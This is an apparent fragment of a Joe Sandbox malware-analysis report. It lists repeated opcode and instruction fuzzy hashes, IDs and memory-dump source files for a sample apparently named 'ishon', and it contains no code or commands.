                                                                          • Opcode Fuzzy Hash: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction Fuzzy Hash: 6CE01AB8E04208EFCB84DFA8D5416ADFBF4EB48304F10C0AED818A3341D632AA06DF40
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction ID: 955b27e14676167293f84dccc50a99d5b1fb89aa72af3340981a7c9bee7ae006
                                                                          • Opcode Fuzzy Hash: b77a41d5481910581fc764d3acd7f736d244c0fb4c1de4f0bfb5bb3bcebba242
                                                                          • Instruction Fuzzy Hash: 21E0E5B8E04208EFCB84DFA8D5816ACBBF5EB48300F10C5AE981CA7341D635AA02DF44
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1eab6defce6e153c5430557be8c901cf19ccc7f864016c98f5565e6004aed194
                                                                          • Instruction ID: 2479d970bd8103cf7351552f9e9ed2b86544d264be9d8b0e8dad5ad343cc6ad3
                                                                          • Opcode Fuzzy Hash: 1eab6defce6e153c5430557be8c901cf19ccc7f864016c98f5565e6004aed194
                                                                          • Instruction Fuzzy Hash: A5E026B1484108DFC700DFF8C5002ED3BE9EB84200F4045ABD00893560DA304A11EB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a40ad2d00a525c287a63bb3b27d10663d6769e812f0344948a0f4c35ccc62c8a
                                                                          • Instruction ID: 1f48329aa07eeb05aff86fbfe1e6af71262d9d7e3d34a9dcd755ba108f004854
                                                                          • Opcode Fuzzy Hash: a40ad2d00a525c287a63bb3b27d10663d6769e812f0344948a0f4c35ccc62c8a
                                                                          • Instruction Fuzzy Hash: 62E086B4914108DFC780DFACC54169CBBF4EB08204F1080AED808D3341D7329E41CB41
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3efdc3e6139ef70d1885473a9f4839d7443bc237e11e4f89f0e29edd4cc63e47
                                                                          • Instruction ID: c866e94c73aa4be5ffb927f03a0ca6df6326f17b5cd84913aca745e07a266e04
                                                                          • Opcode Fuzzy Hash: 3efdc3e6139ef70d1885473a9f4839d7443bc237e11e4f89f0e29edd4cc63e47
                                                                          • Instruction Fuzzy Hash: BEE0C2E6E090855BD716C76868515E13B64CD6324074542DFE4488B52DE2188A17DB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3dfc9a23c44ab0019b3cae7e62bfd37af19ab90c19f8c7f26d1eec2616030abd
                                                                          • Instruction ID: 2e0e1e70e0a925502e0668cda7686fcd32c55af8668292ae52c8c2d64cbf8938
                                                                          • Opcode Fuzzy Hash: 3dfc9a23c44ab0019b3cae7e62bfd37af19ab90c19f8c7f26d1eec2616030abd
                                                                          • Instruction Fuzzy Hash: 86E012F145120CEFC701EFF9C9016DE7BEDEB49211F4045ABD50493610EE755A14EB52
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd